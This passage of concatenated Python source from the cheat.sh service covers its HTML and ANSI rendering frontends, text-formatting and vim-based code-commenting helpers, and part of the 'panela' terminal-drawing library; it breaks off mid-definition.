sys.path.append("%s/lib/" % MYDIR) # pylint: disable=wrong-import-position from config import CONFIG from globals import error from buttons import TWITTER_BUTTON, GITHUB_BUTTON, GITHUB_BUTTON_FOOTER import frontend.ansi # temporary having it here, but actually we have the same data # in the adapter module GITHUB_REPOSITORY = { "late.nz" : 'chubin/late.nz', "cheat.sheets" : 'chubin/cheat.sheets', "cheat.sheets dir" : 'chubin/cheat.sheets', "tldr" : 'tldr-pages/tldr', "cheat" : 'chrisallenlane/cheat', "learnxiny" : 'adambard/learnxinyminutes-docs', "internal" : '', "search" : '', "unknown" : '', } def visualize(answer_data, request_options): query = answer_data['query'] answers = answer_data['answers'] topics_list = answer_data['topics_list'] editable = (len(answers) == 1 and answers[0]['topic_type'] == 'cheat.sheets') repository_button = '' if len(answers) == 1: repository_button = _github_button(answers[0]['topic_type']) result, found = frontend.ansi.visualize(answer_data, request_options) return _render_html(query, result, editable, repository_button, topics_list, request_options), found def _github_button(topic_type): full_name = GITHUB_REPOSITORY.get(topic_type, '') if not full_name: return '' short_name = full_name.split('/', 1)[1] # pylint: disable=unused-variable button = ( "<!-- Place this tag where you want the button to render. -->" '<a aria-label="Star %(full_name)s on GitHub"' ' data-count-aria-label="# stargazers on GitHub"' ' data-count-api="/repos/%(full_name)s#stargazers_count"' ' data-count-href="/%(full_name)s/stargazers"' ' data-icon="octicon-star"' ' href="https://github.com/%(full_name)s"' ' class="github-button">%(short_name)s</a>' ) % locals() return button def _render_html(query, result, editable, repository_button, topics_list, request_options): def _html_wrapper(data): """ Convert ANSI text `data` to HTML """ cmd = ["bash", CONFIG['path.internal.ansi2html'], "--palette=solarized", "--bg=dark"] try: proc = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE) except FileNotFoundError: print("ERROR: %s" % cmd) raise data = data.encode('utf-8') stdout, stderr = proc.communicate(data) if proc.returncode != 0: error((stdout + stderr).decode('utf-8')) return stdout.decode('utf-8') result = result + "\n$" result = _html_wrapper(result) title = "<title>cheat.sh/%s</title>" % query submit_button = ('<input type="submit" style="position: absolute;' ' left: -9999px; width: 1px; height: 1px;" tabindex="-1" />') topic_list = ('<datalist id="topics">%s</datalist>' % ("\n".join("<option value='%s'></option>" % x for x in topics_list))) curl_line = "<span class='pre'>$ curl cheat.sh/</span>" if query == ':firstpage': query = "" form_html = ('<form action="/" method="GET">' '%s%s' '<input' ' type="text" value="%s" name="topic"' ' list="topics" autofocus autocomplete="off"/>' '%s' '</form>') \ % (submit_button, curl_line, query, topic_list) edit_button = '' if editable: # It's possible that topic directory starts with omitted underscore if '/' in query: query = '_' + query edit_page_link = 'https://github.com/chubin/cheat.sheets/edit/master/sheets/' + query edit_button = ( '<pre style="position:absolute;padding-left:40em;overflow:visible;height:0;">' '[<a href="%s" style="color:cyan">edit</a>]' '</pre>') % edit_page_link result = re.sub("<pre>", edit_button + form_html + "<pre>", result) result = re.sub("<head>", "<head>" + title, result) if not request_options.get('quiet'): result = result.replace('</body>', TWITTER_BUTTON \ + GITHUB_BUTTON \ + repository_button \ + GITHUB_BUTTON_FOOTER \ + '</body>') return result File: lib/frontend/__init__.py File: lib/frontend/ansi.py """ ANSI frontend. Exports: visualize(answer_data, request_options) Format: answer_data = { 'answers': '...',} answers = [answer,...] answer = { 'topic': '...', 'topic_type': '...', 'answer': '...', 'format': 'ansi|code|markdown|text...', } Configuration parameters: frontend.styles """ import os import sys import re import colored from pygments import highlight as pygments_highlight from pygments.formatters import Terminal256Formatter # pylint: disable=no-name-in-module # pylint: disable=wrong-import-position sys.path.append(os.path.abspath(os.path.join(__file__, '..'))) from config import CONFIG import languages_data # pylint: enable=wrong-import-position import fmt.internal import fmt.comments def visualize(answer_data, request_options): """ Renders `answer_data` as ANSI output. """ answers = answer_data['answers'] return _visualize(answers, request_options, search_mode=bool(answer_data['keyword'])) ANSI_ESCAPE = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]') def remove_ansi(sometext): """ Remove ANSI sequences from `sometext` and convert it into plaintext. """ return ANSI_ESCAPE.sub('', sometext) def _limited_answer(answer): return colored.bg('dark_goldenrod') + colored.fg('yellow_1') \ + ' ' + answer + ' ' \ + colored.attr('reset') + "\n" def _colorize_ansi_answer(topic, answer, color_style, # pylint: disable=too-many-arguments highlight_all=True, highlight_code=False, unindent_code=False, language=None): color_style = color_style or "native" lexer_class = languages_data.LEXER['bash'] if '/' in topic: if language is None: section_name = topic.split('/', 1)[0].lower() else: section_name = language section_name = languages_data.get_lexer_name(section_name) lexer_class = languages_data.LEXER.get(section_name, lexer_class) if section_name == 'php': answer = "<?\n%s?>\n" % answer if highlight_all: highlight = lambda answer: pygments_highlight( answer, lexer_class(), Terminal256Formatter(style=color_style)).strip('\n')+'\n' else: highlight = lambda x: x if highlight_code: blocks = fmt.comments.code_blocks( answer, wrap_lines=True, unindent_code=(4 if unindent_code else False)) highlighted_blocks = [] for block in blocks: if block[0] == 1: this_block = highlight(block[1]) else: this_block = block[1].strip('\n')+'\n' highlighted_blocks.append(this_block) result = "\n".join(highlighted_blocks) else: result = highlight(answer).lstrip('\n') return result def _visualize(answers, request_options, search_mode=False): highlight = not bool(request_options and request_options.get('no-terminal')) color_style = (request_options or {}).get('style', '') if color_style not in CONFIG['frontend.styles']: color_style = '' # if there is more than one answer, # show the source of the answer multiple_answers = len(answers) > 1 found = True result = "" for answer_dict in answers: topic = answer_dict['topic'] topic_type = answer_dict['topic_type'] answer = answer_dict['answer'] found = found and not topic_type == 'unknown' if multiple_answers and topic != 'LIMITED': section_name = f"{topic_type}:{topic}" if not highlight: result += f"#[{section_name}]\n" else: result += "".join([ "\n", colored.bg('dark_gray'), colored.attr("res_underlined"), f" {section_name} ", colored.attr("res_underlined"), colored.attr('reset'), "\n"]) if answer_dict['format'] in ['ansi', 'text']: result += answer elif topic == ':firstpage-v1': result += fmt.internal.colorize_internal_firstpage_v1(answer) elif topic == 'LIMITED': result += _limited_answer(topic) else: result += _colorize_ansi_answer( topic, answer, color_style, highlight_all=highlight, highlight_code=(topic_type == 'question' and not request_options.get('add_comments') and not request_options.get('remove_text')), language=answer_dict.get("filetype")) if request_options.get('no-terminal'): result = remove_ansi(result) result = result.strip('\n') + "\n" return result, found File: lib/fmt/internal.py """ Colorize internal cheat sheets. Will be merged with panela later. """ import re from colorama import Fore, Back, Style import colored PALETTES = { 0: { 1: Fore.WHITE, 2: Style.DIM, }, 1: { 1: Fore.CYAN, 2: Fore.GREEN, 3: colored.fg('orange_3'), 4: Style.DIM, 5: Style.DIM, }, 2: { 1: Fore.RED, 2: Style.DIM, }, } def _reverse_palette(code): return { 1 : Fore.BLACK + _back_color(code), 2 : Style.DIM } def _back_color(code): if code == 0 or (isinstance(code, str) and code.lower() == "white"): return Back.WHITE if code == 1 or (isinstance(code, str) and code.lower() == "cyan"): return Back.CYAN if code == 2 or (isinstance(code, str) and code.lower() == "red"): return Back.RED return Back.WHITE def colorize_internal(text, palette_number=1): """ Colorize `text`, use `palette` """ palette = PALETTES[palette_number] palette_reverse = _reverse_palette(palette_number) def _process_text(text): text = text.group()[1:-1] factor = 1 if text.startswith('-'): text = text[1:] factor = -1 stripped = text.lstrip('0123456789') return (text, stripped, factor) def _extract_color_number(text, stripped, factor=1): return int(text[:len(text)-len(stripped)])*factor def _colorize_curlies_block(text): text, stripped, factor = _process_text(text) color_number = _extract_color_number(text, stripped, factor) if stripped.startswith('='): stripped = stripped[1:] reverse = (color_number < 0) if reverse: color_number = -color_number if reverse: stripped = palette_reverse[color_number] + stripped + Style.RESET_ALL else: stripped = palette[color_number] + stripped + Style.RESET_ALL return stripped def _colorize_headers(text): if text.group(0).endswith('\n'): newline = '\n' else: newline = '' color_number = 3 return palette[color_number] + text.group(0).strip() + Style.RESET_ALL + newline text = re.sub("{.*?}", _colorize_curlies_block, text) text = re.sub("#(.*?)\n", _colorize_headers, text) return text def colorize_internal_firstpage_v1(answer): """ Colorize "/:firstpage-v1". Legacy. """ def _colorize_line(line): if line.startswith('T'): line = colored.fg("grey_62") + line + colored.attr('reset') line = re.sub(r"\{(.*?)\}", colored.fg("orange_3") + r"\1"+colored.fg('grey_35'), line) return line line = re.sub(r"\[(F.*?)\]", colored.bg("black") + colored.fg("cyan") + r"[\1]"+colored.attr('reset'), line) line = re.sub(r"\[(g.*?)\]", colored.bg("dark_gray")+colored.fg("grey_0")+r"[\1]"+colored.attr('reset'), line) line = re.sub(r"\{(.*?)\}", colored.fg("orange_3") + r"\1"+colored.attr('reset'), line) line = re.sub(r"<(.*?)>", colored.fg("cyan") + r"\1"+colored.attr('reset'), line) return line lines = answer.splitlines() answer_lines = lines[:9] answer_lines.append(colored.fg('grey_35')+lines[9]+colored.attr('reset')) for line in lines[10:]: answer_lines.append(_colorize_line(line)) answer = "\n".join(answer_lines) + "\n" return answer File: lib/fmt/__init__.py File: lib/fmt/markdown.py """ Markdown support. Exports: format_text(text, config=None, highlighter=None): Uses external pygments formatters for highlighting (passed as an argument). """ import re import ansiwrap import colored def format_text(text, config=None, highlighter=None): """ Renders `text` according to markdown rules. Uses `highlighter` for syntax highlighting. Returns a dictionary with "output" and "links". """ return _format_section(text, config=config, highlighter=highlighter) def _split_into_paragraphs(text): return re.split('\n\n+', text) def _colorize(text): return \ re.sub( r"`(.*?)`", colored.bg("dark_gray") \ + colored.fg("white") \ + " " + r"\1" + " " \ + colored.attr('reset'), re.sub( r"\*\*(.*?)\*\*", colored.attr('bold') \ + colored.fg("white") \ + r"\1" \ + colored.attr('reset'), text)) def _format_section(section_text, config=None, highlighter=None): answer = '' # cut code blocks block_number = 0 while True: section_text, replacements = re.subn( '^```.*?^```', 'MULTILINE_BLOCK_%s' % block_number, section_text, 1, flags=re.S | re.MULTILINE) block_number += 1 if not replacements: break # cut links links = [] while True: regexp = re.compile(r'\[(.*?)\]\((.*?)\)') match = regexp.search(section_text) if match: links.append(match.group(0)) text = match.group(1) # links are not yet supported # text = '\x1B]8;;%s\x1B\\\\%s\x1B]8;;\x1B\\\\' % (match.group(2), match.group(1)) else: break section_text, replacements = regexp.subn( text, # 'LINK_%s' % len(links), section_text, 1) block_number += 1 if not replacements: break for paragraph in _split_into_paragraphs(section_text): answer += "\n".join( ansiwrap.fill(_colorize(line)) + "\n" for line in paragraph.splitlines()) + "\n" return { 'ansi': answer, 'links': links } File: lib/fmt/comments.py """ Extract text from the text-code stream and comment it. Supports three modes of normalization and commenting: 1. Don't add any comments 2. Add comments 3. Remove text, leave code only Since several operations are quite expensive, it actively uses caching. Exported functions: beautify(text, lang, options) code_blocks(text) Configuration parameters: """ from __future__ import print_function import sys import os import textwrap import hashlib import re from itertools import groupby, chain from subprocess import Popen from tempfile import NamedTemporaryFile from config import CONFIG from languages_data import VIM_NAME import cache FNULL = open(os.devnull, 'w') TEXT = 0 CODE = 1 UNDEFINED = -1 CODE_WHITESPACE = -2 def _language_name(name): return VIM_NAME.get(name, name) def _remove_empty_lines_from_beginning(lines): start = 0 while start < len(lines) and lines[start].strip() == '': start += 1 lines = lines[start:] return lines def _remove_empty_lines_from_end(lines): end = len(lines) - 1 while end >= 0 and lines[end].strip() == '': end -= 1 lines = lines[:end+1] return lines def _cleanup_lines(lines): """ Cleanup `lines` a little bit: remove empty lines at the beginning and at the end; remove too many empty lines in between. """ lines = _remove_empty_lines_from_beginning(lines) lines = _remove_empty_lines_from_end(lines) if lines == []: return lines # remove repeating empty lines lines = list(chain.from_iterable( [(list(x[1]) if x[0] else ['']) for x in groupby(lines, key=lambda x: x.strip() != '')])) return lines def _line_type(line): """ Classify each line and say which of them are text (0) and which of them are code (1). A line is considered to be code, if it starts with four spaces. A line is considerer to be text if it is not empty and is not code. If line is empty, it is considered to be code if it surrounded but two other code lines, or if it is the first/last line and it has code on the other side. """ if line.strip() == '': return UNDEFINED # some line may start with spaces but still be not code. # we need some heuristics here, but for the moment just # whitelist such cases: if line.strip().startswith('* ') or re.match(r'[0-9]+\.', line.strip()): return TEXT if line.startswith(' '): return CODE return TEXT def _classify_lines(lines): line_types = [_line_type(line) for line in lines] # pass 2: # adding empty code lines to the code for i in range(len(line_types) - 1): if line_types[i] == CODE and line_types[i+1] == UNDEFINED: line_types[i+1] = CODE_WHITESPACE changed = True for i in range(len(line_types) - 1)[::-1]: if line_types[i] == UNDEFINED and line_types[i+1] == CODE: line_types[i] = CODE_WHITESPACE changed = True line_types = [CODE if x == CODE_WHITESPACE else x for x in line_types] # pass 3: # fixing undefined line types (-1) changed = True while changed: changed = False # changing all lines types that are near the text for i in range(len(line_types) - 1): if line_types[i] == TEXT and line_types[i+1] == UNDEFINED: line_types[i+1] = TEXT changed = True for i in range(len(line_types) - 1)[::-1]: if line_types[i] == UNDEFINED and line_types[i+1] == TEXT: line_types[i] = TEXT changed = True # everything what is still undefined, change to code type line_types = [CODE if x == UNDEFINED else x for x in line_types] return line_types def _unindent_code(line, shift=0): if shift == -1 and line != '': return ' ' + line if shift > 0 and line.startswith(' '*shift): return line[shift:] return line def _wrap_lines(lines_classes, unindent_code=False): """ Wrap classified lines. Add the split lines to the stream. If `unindent_code` is True, remove leading four spaces. """ result = [] for line_type, line_content in lines_classes: if line_type == CODE: shift = 3 if unindent_code else -1 result.append((line_type, _unindent_code(line_content, shift=shift))) else: if line_content.strip() == "": result.append((line_type, "")) for line in textwrap.fill(line_content).splitlines(): result.append((line_type, line)) return result def _run_vim_script(script_lines, text_lines): """ Apply `script_lines` to `lines_classes` and returns the result """ script_vim = NamedTemporaryFile(delete=True) textfile = NamedTemporaryFile(delete=True) open(script_vim.name, "w").write("\n".join(script_lines)) open(textfile.name, "w").write("\n".join(text_lines)) script_vim.file.close() textfile.file.close() my_env = os.environ.copy() my_env['HOME'] = CONFIG["path.internal.vim"] cmd = ["script", "-q", "-c", "vim -S %s %s" % (script_vim.name, textfile.name)] Popen(cmd, shell=False, stdin=open(os.devnull, 'r'), stdout=FNULL, stderr=FNULL, env=my_env).communicate() return open(textfile.name, "r").read() def _commenting_script(lines_blocks, filetype): script_lines = [] block_start = 1 for block in lines_blocks: lines = list(block[1]) block_end = block_start + len(lines)-1 if block[0] == 0: comment_type = 'sexy' if block_end - block_start < 1 or filetype == 'ruby': comment_type = 'comment' script_lines.insert(0, "%s,%s call NERDComment(1, '%s')" % (block_start, block_end, comment_type)) script_lines.insert(0, "%s,%s call NERDComment(1, 'uncomment')" % (block_start, block_end)) block_start = block_end + 1 script_lines.insert(0, "set ft=%s" % _language_name(filetype)) script_lines.append("wq") return script_lines def _beautify(text, filetype, add_comments=False, remove_text=False): """ Main function that actually does the whole beautification job. """ # We shift the code if and only if we either convert the text into comments # or remove the text completely. Otherwise the code has to remain aligned unindent_code = add_comments or remove_text lines = [x.decode("utf-8").rstrip('\n') for x in text.splitlines()] lines = _cleanup_lines(lines) lines_classes = zip(_classify_lines(lines), lines) lines_classes = _wrap_lines(lines_classes, unindent_code=unindent_code) if remove_text: lines = [line[1] for line in lines_classes if line[0] == 1] lines = _cleanup_lines(lines) output = "\n".join(lines) if not output.endswith('\n'): output += "\n" elif not add_comments: output = "\n".join(line[1] for line in lines_classes) else: lines_blocks = groupby(lines_classes, key=lambda x: x[0]) script_lines = _commenting_script(lines_blocks, filetype) output = _run_vim_script( script_lines, [line for (_, line) in lines_classes]) return output def code_blocks(text, wrap_lines=False, unindent_code=False): """ Split `text` into blocks of text and code. Return list of tuples TYPE, TEXT """ text = text.encode('utf-8') lines = [x.rstrip('\n') for x in text.splitlines()] lines_classes = zip(_classify_lines(lines), lines) if wrap_lines: lines_classes = _wrap_lines(lines_classes, unindent_code=unindent_code) lines_blocks = groupby(lines_classes, key=lambda x: x[0]) answer = [(x[0], "\n".join([y[1] for y in x[1]])+"\n") for x in lines_blocks] return answer def beautify(text, lang, options): """ Process input `text` according to the specified `mode`. Adds comments if needed, according to the `lang` rules. Caches the results. The whole work (except caching) is done by _beautify(). """ options = options or {} beauty_options = dict((k, v) for k, v in options.items() if k in ['add_comments', 'remove_text']) mode = '' if beauty_options.get('add_comments'): mode += 'c' if beauty_options.get('remove_text'): mode += 'q' if beauty_options == {}: # if mode is unknown, just don't transform the text at all return text if isinstance(text, str): text = text.encode('utf-8') digest = "t:%s:%s:%s" % (hashlib.md5(text).hexdigest(), lang, mode) # temporary added line that removes invalid cache entries # that used wrong commenting methods if lang in ["git", "django", "flask", "cmake"]: cache.delete(digest) answer = cache.get(digest) if answer: return answer answer = _beautify(text, lang, **beauty_options) cache.put(digest, answer) return answer def __main__(): text = sys.stdin.read() filetype = sys.argv[1] options = { "": {}, "c": dict(add_comments=True), "C": dict(add_comments=False), "q": dict(remove_text=True), }[sys.argv[2]] result = beautify(text, filetype, options) sys.stdout.write(result) if __name__ == '__main__': __main__() File: lib/panela/panela_colors.py # vim: encoding=utf-8 import os import sys import colored import itertools from globals import MYDIR """ After panela will be ready for it, it will be split out in a separate project, that will be used for all chubin's console services. There are several features that not yet implemented (see ___doc___ in Panela) TODO: * html output * png output """ from wcwidth import wcswidth from colors import find_nearest_color, HEX_TO_ANSI, rgb_from_str import pyte # http://stackoverflow.com/questions/19782975/convert-rgb-color-to-the-nearest-color-in-palette-web-safe-color try: basestring # Python 2 except NameError: basestring = str # Python 3 def color_mapping(clr): if clr == 'default': return None return clr class Point(object): """ One point (character) on a terminal """ def __init__(self, char=None, foreground=None, background=None): self.foreground = foreground self.background = background self.char = char class Panela: """ To implement: Blocks manipulation: [*] copy [*] crop [*] cut [*] extend [ ] join [ ] move [*] paste [*] strip Colors manipulation: [*] paint foreground/background [*] paint_line [ ] paint_svg [ ] fill background [ ] fill_line [ ] fill_svg [ ] trans Drawing: [*] put_point [*] put_line [*] put_circle [*] put_rectangle Printing and reading: ansi reads vt100 sequence """ def __init__(self, x=80, y=25, panela=None, field=None): if panela: self.field = [x for x in panela.field] self.size_x = panela.size_x self.size_y = panela.size_y return if field: self.field = field self.size_x = len(field[0]) self.size_y = len(field) return self.field = [[Point() for _ in range(x)] for _ in range(y)] self.size_x = x self.size_y = y def in_field(self, col, row): if col < 0: return False if row < 0: return False if col >= self.size_x: return False if row >= self.size_y: return False return True # # Blocks manipulation # def copy(self, x1, y1, x2, y2): if x1 < 0: x1 += self.size_x if x2 < 0: x2 += self.size_x if x1 > x2: x1, x2 = x2, x1 if y1 < 0: y1 += self.size_y if y2 < 0: y2 += self.size_y if y1 > y2: y1, y2 = y2, y1 field = [self.field[i] for i in range(y1, y2+1)] field = [line[x1:x2+1] for line in field] return Panela(field=field) def cut(self, x1, y1, x2, y2): """ """ if x1 < 0: x1 += self.size_x if x2 < 0: x2 += self.size_x if x1 > x2: x1, x2 = x2, x1 if y1 < 0: y1 += self.size_y if y2 < 0: y2 += self.size_y if y1 > y2: y1, y2 = y2, y1 copied = self.copy(x1, y1, x2, y2) for y in range(y1, y2+1): for x in range(x1, x2+1): self.field[y][x] = Point() return copied def extend(self, cols=None, rows=None): """ Adds [cols] columns from the right and [rows] rows from the bottom """ if cols and cols > 0: self.field = [x + [Point() for _ in range(cols)] for x in self.field] self.size_x += cols if rows and rows > 0: self.field = self.field + [[Point() for _ in range(self.size_x)] for _ in range(rows)] self.size_y += rows def crop(self, left=None, right=None, top=None, bottom=None): """ Crop panela. Remove <left>, <right> columns from left or right, and <top> and <bottom> rows from top and bottom. """ if left: if left >= self.size_x: left = self.size_x self.field = [x[left:] for x in self.field] self.size_x -= left if right: if right >= self.size_x: right = self.size_x self.field = [x[:-right] for x in self.field] self.size_x -= right if top: if top >= self.size_y: top = self.size_y self.field = self.field[top:] self.size_y -= top if bottom: if bottom >= self.size_y: bottom = self.size_y self.field = self.field[:-bottom] self.size_y -= bottom def paste(self, panela, x1, y1, extend=False, transparence=False): """ Paste <panela> starting at <x1>, <y1>. If <extend> is True current panela space will be automatically extended If <transparence> is True, then <panela> is overlaid and characters behind them are seen """ # FIXME: # negative x1, y1 # x1,y1 > size_x, size_y if extend: x_extend = 0 y_extend = 0 if x1 + panela.size_x > self.size_x: x_extend = x1 + panela.size_x - self.size_x if y1 + panela.size_y > self.size_y: y_extend = y1 + panela.size_y - self.size_y self.extend(cols=x_extend, rows=y_extend) for i in range(y1, min(self.size_y, y1+panela.size_y)): for j in range(x1, min(self.size_x, x1+panela.size_x)): if transparence: if panela.field[i-y1][j-x1].char and panela.field[i-y1][j-x1].char != " ": if panela.field[i-y1][j-x1].foreground: self.field[i][j].foreground = panela.field[i-y1][j-x1].foreground if panela.field[i-y1][j-x1].background: self.field[i][j].background = panela.field[i-y1][j-x1].background self.field[i][j].char = panela.field[i-y1][j-x1].char else: self.field[i][j] = panela.field[i-y1][j-x1] def strip(self): """ Strip panela: remove empty spaces around panels rectangle """ def left_spaces(line): answer = 0 for elem in line: if not elem.char: answer += 1 else: break return answer def right_spaces(line): return left_spaces(line[::-1]) def empty_line(line): return left_spaces(line) == len(line) left_space = [] right_space = [] for line in self.field: left_space.append(left_spaces(line)) right_space.append(right_spaces(line)) left = min(left_space) right = min(right_space) top = 0 while top < self.size_y and empty_line(self.field[top]): top += 1 bottom = 0 while bottom < self.size_y and empty_line(self.field[-(bottom+1)]): bottom += 1 self.crop(left=left, right=right, top=top, bottom=bottom) # # Drawing and painting # def put_point(self, col, row, char=None, color=None, background=None): """ Puts character with color and background color on the field. Char can be a Point or a character. """ if not self.in_field(col, row): return if isinstance(char, Point): self.field[row][col] = char elif char is None: if background: self.field[row][col].background = background if color: self.field[row][col].foreground = color else: self.field[row][col] = Point(char=char, foreground=color, background=background) def put_string(self, col, row, s=None, color=None, background=None): """ Put string <s> with foreground color <color> and background color <background> ad <col>, <row> """ for i, c in enumerate(s): self.put_point(col+i, row, c, color=color, background=background) def put_line(self, x1, y1, x2, y2, char=None, color=None, background=None): """ Draw line (x1, y1) - (x2, y2) fith foreground color <color>, background color <background> and character <char>, if specified. """ def get_line(start, end): """Bresenham's Line Algorithm Produces a list of tuples from start and end Source: http://www.roguebasin.com/index.php?title=Bresenham%27s_Line_Algorithm#Python >>> points1 = get_line((0, 0), (3, 4)) >>> points2 = get_line((3, 4), (0, 0)) >>> assert(set(points1) == set(points2)) >>> print points1 [(0, 0), (1, 1), (1, 2), (2, 3), (3, 4)] >>> print points2 [(3, 4), (2, 3), (1, 2), (1, 1), (0, 0)] """ # Setup initial conditions x1, y1 = start x2, y2 = end dx = x2 - x1 dy = y2 - y1 # Determine how steep the line is is_steep = abs(dy) > abs(dx) # Rotate line if is_steep: x1, y1 = y1, x1 x2, y2 = y2, x2 # Swap start and end points if necessary and store swap state swapped = False if x1 > x2: x1, x2 = x2, x1 y1, y2 = y2, y1 swapped = True # Recalculate differentials dx = x2 - x1 dy = y2 - y1 # Calculate error error = int(dx / 2.0) ystep = 1 if y1 < y2 else -1 # Iterate over bounding box generating points between start and end y = y1 points = [] for x in range(x1, x2 + 1): coord = (y, x) if is_steep else (x, y) points.append(coord) error -= abs(dy) if error < 0: y += ystep error += dx # Reverse the list if the coordinates were swapped if swapped: points.reverse() return points if color and not isinstance(color, basestring): color_iter = itertools.cycle(color) else: color_iter = itertools.repeat(color) if background and not isinstance(background, basestring): background_iter = itertools.cycle(background) else: background_iter = itertools.repeat(background) if char: char_iter = itertools.cycle(char) else: char_iter = itertools.repeat(char) for x, y in get_line((x1,y1), (x2, y2)): char = next(char_iter) color = next(color_iter) background = next(background_iter) self.put_point(x, y, char=char, color=color, background=background) def paint(self, x1, y1, x2, y2, c1, c2=None, bg1=None, bg2=None, angle=None, angle_bg=None): """ Paint rectangle (x1,y1) (x2,y2) with foreground color c1 and background bg1 if specified. If spefied colors c2/bg2, rectangle is painted with linear gradient (inclined under angle). """ def calculate_color(i, j): if angle == None: a = 0 else: a = angle r1, g1, b1 = rgb_from_str(c1) r2, g2, b2 = rgb_from_str(c2) k = 1.0*(j-x1)/(x2-x1)*(1-a) l = 1.0*(i-y1)/(y2-y1)*a r3, g3, b3 = int(r1 + 1.0*(r2-r1)*(k+l)), int(g1 + 1.0*(g2-g1)*(k+l)), int(b1 + 1.0*(b2-b1)*(k+l)) return "#%02x%02x%02x" % (r3, g3, b3) def calculate_bg(i, j): if angle_bg == None: a = 0 else: a = angle r1, g1, b1 = rgb_from_str(bg1) r2, g2, b2 = rgb_from_str(bg2) k = 1.0*(j-x1)/(x2-x1)*(1-a) l = 1.0*(i-y1)/(y2-y1)*a r3, g3, b3 = int(r1 + 1.0*(r2-r1)*(k+l)), int(g1 + 1.0*(g2-g1)*(k+l)), int(b1 + 1.0*(b2-b1)*(k+l)) return "#%02x%02x%02x" % (r3, g3, b3) if c2 == None: for i in range(y1,y2): for j in range(x1, x2): self.field[i][j].foreground = c1 if bg1: if bg2: self.field[i][j].background = calculate_bg(i, j) else: self.field[i][j].background = bg1 else: for i in range(y1,y2): for j in range(x1, x2): self.field[i][j].foreground = calculate_color(i, j) if bg1: if bg2: self.field[i][j].background = calculate_bg(i, j) else: self.field[i][j].background = bg1 return self def put_rectangle(self, x1, y1, x2, y2, char=None, frame=None, color=None, background=None): """ Draw rectangle (x1,y1), (x2,y2) using <char> character, <color> and <background> color """ frame_chars = { 'ascii': u'++++-|', 'single': u'┌┐└┘─│', 'double': u'┌┐└┘─│', } if frame in frame_chars: chars = frame_chars[frame] else: chars = char*6 for x in range(x1, x2): self.put_point(x, y1, char=chars[4], color=color, background=background) self.put_point(x, y2, char=chars[4], color=color, background=background) for y in range(y1, y2): self.put_point(x1, y, char=chars[5], color=color, background=background) self.put_point(x2, y, char=chars[5], color=color, background=background) self.put_point(x1, y1, char=chars[0], color=color, background=background) self.put_point(x2, y1, char=chars[1], color=color, background=background) self.put_point(x1, y2, char=chars[2], color=color, background=background) self.put_point(x2, y2, char=chars[3], color=color, background=background) def put_circle(self, x0, y0, radius, char=None, color=None, background=None): """ Draw cricle with center in (x, y) and radius r (x1,y1), (x2,y2) using <char> character, <color> and <background> color """ def k(x): return int(x*1.9) f = 1 - radius ddf_x = 1 ddf_y = -2 * radius x = 0 y = radius self.put_point(x0, y0 + radius, char=char, color=color, background=background) self.put_point(x0, y0 - radius, char=char, color=color, background=background) self.put_point(x0 + k(radius), y0, char=char, color=color, background=background) self.put_point(x0 - k(radius), y0, char=char, color=color, background=background) char = "x" while x < y: if f >= 0: y -= 1 ddf_y += 2 f += ddf_y x += 1 ddf_x += 2 f += ddf_x self.put_point(x0 + k(x), y0 + y, char=char, color=color, background=background) self.put_point(x0 - k(x), y0 + y, char=char, color=color, background=background) self.put_point(x0 + k(x), y0 - y, char=char, color=color, background=background) self.put_point(x0 - k(x), y0 - y, char=char, color=color, background=background) self.put_point(x0 + k(y), y0 + x, char=char, color=color, background=background) self.put_point(x0 - k(y), y0 + x, char=char, color=color, background=background) self.put_point(x0 + k(y), y0 - x, char=char, color=color, background=background) self.put_point(x0 - k(y), y0 - x, char=char, color=color, background=background) def read_ansi(self, seq, x=0, y=0, transparence=True): """ Read ANSI sequence and render it to the panela starting from x and y. If transparence is True, replace spaces with "" """ screen = pyte.screens.Screen(self.size_x, self.size_y+1) stream = pyte.streams.ByteStream() stream.attach(screen) stream.feed(seq.replace('\n', '\r\n')) for i, line in sorted(screen.buffer.items(), key=lambda x: x[0]): for j, char in sorted(line.items(), key=lambda x: x[0]): if j >= self.size_x: break self.field[i][j] = Point(char.data, color_mapping(char.fg), color_mapping(char.bg)) def __str__(self): answer = "" skip_next = False for i, line in enumerate(self.field): for j, c in enumerate(line): fg_ansi = "" bg_ansi = "" stop = "" if self.field[i][j].foreground: fg_ansi = '\033[38;2;%s;%s;%sm' % rgb_from_str(self.field[i][j].foreground) stop = colored.attr("reset") if self.field[i][j].background: bg_ansi = '\033[48;2;%s;%s;%sm' % rgb_from_str(self.field[i][j].background) stop = colored.attr("reset") char = c.char or " " if not skip_next: answer += fg_ansi + bg_ansi + char.encode('utf-8') + stop skip_next = wcswidth(char) == 2 # answer += "...\n" answer += "\n" return answer ######################################################################################################## class Template(object): def __init__(self): self._mode = 'page' self.page = [] self.mask = [] self.code = [] self.panela = None self._colors = { 'A': '#00cc00', 'B': '#00cc00', 'C': '#00aacc', 'D': '#888888', 'E': '#cccc00', 'F': '#ff0000', 'H': '#22aa22', 'I': '#cc0000', 'J': '#000000', } self._bg_colors = { 'G': '#555555', 'J': '#555555', } def _process_line(self, line): if line == 'mask': self._mode = 'mask' if line == '': self._mode = 'code' def read(self, filename): """ Read template from `filename` """ with open(filename) as f: self._mode = 'page' for line in f.readlines(): line = line.rstrip('\n') if line.startswith('==[') and line.endswith(']=='): self._process_line(line[3:-3].strip()) continue if self._mode == 'page': self.page.append(line) elif self._mode == 'mask': self.mask.append(line) elif self._mode == 'code': self.mask.append(line) def apply_mask(self): lines = self.page x_size = max([len(x) for x in lines]) y_size = len(lines) self.panela = Panela(x=x_size, y=y_size) self.panela.read_ansi("".join("%s\n" % x for x in self.page)) for i, line in enumerate(self.mask): for j, char in enumerate(line): if char in self._colors or char in self._bg_colors: color = self._colors.get(char) bg_color = self._bg_colors.get(char) self.panela.put_point(j, i, color=color, background=bg_color) def show(self): if self.panela: return str(self.panela) return self.page def main(): "Only for experiments" pagepath = os.path.join(MYDIR, "share/firstpage-v2.pnl") template = Template() template.read(pagepath) template.apply_mask() sys.stdout.write(template.show()) if __name__ == '__main__': main() File: lib/panela/colors.py import os import json COLORS_JSON = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'colors.json') COLOR_TABLE = json.loads(open(COLORS_JSON, 'r').read()) VALID_COLORS = [x['hexString'] for x in COLOR_TABLE] HEX_TO_ANSI = {x['hexString']:x['colorId'] for x in COLOR_TABLE} def rgb_from_str(s): # s starts with a #. r, g, b = int(s[1:3],16), int(s[3:5], 16),int(s[5:7], 16) return r, g, b def 